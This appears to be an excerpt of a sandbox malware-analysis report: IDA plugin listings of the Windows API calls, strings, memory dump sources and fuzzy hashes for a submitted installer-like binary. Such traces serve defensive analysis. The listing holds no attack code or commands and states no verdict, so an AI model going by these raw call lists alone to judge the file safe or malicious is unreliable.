  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
• GlobalFree.KERNEL32(?), ref: 00406509
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
• GetDlgItem.USER32(?,000003E8), ref: 004041AD
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
• GetSysColor.USER32(?), ref: 004041DB
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
• lstrlenW.KERNEL32(?), ref: 00404202
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
• GetDlgItem.USER32(?,0000040A), ref: 00404276
• SendMessageW.USER32(00000000), ref: 0040427D
• GetDlgItem.USER32(?,000003E8), ref: 004042AA
• SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                      • String ID: F$N$open
                                                                                                                                                                                                                                                                                      • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                      • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                      • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                      • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                      • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                      • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                      • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                      • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                      • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                      • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                      • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                      • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                      • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                      • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                      • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                      • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                      • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                      • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                      • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                      • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                      • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004279E0,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                      • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                      • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                      • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                      • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                      • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004279E0,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
